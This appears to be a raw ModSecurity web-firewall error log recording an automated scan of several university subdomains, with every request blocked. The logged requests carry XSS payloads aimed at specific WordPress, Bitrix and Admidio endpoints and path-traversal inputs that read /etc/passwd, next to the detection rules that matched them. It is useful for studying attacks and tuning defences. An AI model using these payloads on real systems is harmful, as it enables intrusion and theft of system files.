"/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArePLkAAAAJ"]
[Tue Aug 29 11:57:27.559682 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAqsWEcAAAAB"]
[Tue Aug 29 11:57:27.560858 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAocysoAAAAR"]
[Tue Aug 29 11:57:27.581638 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAriwgoAAAAK"]
[Tue Aug 29 11:57:28.637217 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16uMCo-f0AAAq@sp4AAAAM"]
[Tue Aug 29 11:57:30.533183 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAAocytUAAAAR"]
[Tue Aug 29 11:57:30.553039 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArePM4AAAAJ"]
[Tue Aug 29 11:57:30.555494 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAq@sqIAAAAM"]
[Tue Aug 29 11:57:30.556801 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArdQkAAAAAI"]
[Tue Aug 29 11:57:30.557915 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArh0UUAAAAC"]
[Tue Aug 29 11:57:30.572613 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArbWbcAAAAG"]
[Tue Aug 29 11:57:30.573024 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hYAAAAS"]
[Tue Aug 29 11:57:30.574597 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArePM8AAAAJ"]
[Tue Aug 29 11:57:30.583981 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArLLkkAAAAb"]
[Tue Aug 29 11:57:30.604377 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArLLkoAAAAb"]
[Tue Aug 29 11:57:30.613162 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAoz8hgAAAAS"]
[Tue Aug 29 11:57:30.648236 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqUAAAAM"]
[Tue Aug 29 11:57:30.667034 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hoAAAAS"]
[Tue Aug 29 11:57:30.727369 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqkAAAAM"]
[Tue Aug 29 11:57:30.748436 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8h4AAAAS"]
[Tue Aug 29 11:57:31.592619 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16u8Co-f0AAArLLlQAAAAb"]
[Tue Aug 29 11:57:31.666797 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArdQksAAAAI"]
[Tue Aug 29 11:57:31.682404 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16u8Co-f0AAArLLlcAAAAb"]
[Tue Aug 29 11:57:31.686304 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAq@srAAAAAM"]
[Tue Aug 29 11:57:31.706586 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAocyuQAAAAR"]
[Tue Aug 29 11:57:31.710132 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAriwhoAAAAK"]
[Tue Aug 29 11:57:31.715964 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArbWcUAAAAG"]
[Tue Aug 29 11:57:32.535736 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAoz8iQAAAAS"]
[Tue Aug 29 11:57:32.718911 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAocyukAAAAR"]
[Tue Aug 29 11:57:32.736117 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAq@srgAAAAM"]
[Tue Aug 29 11:57:32.761166 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16vMCo-f0AAAnEqfUAAAAO"]
[Tue Aug 29 11:57:33.539968 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAocyuwAAAAR"]
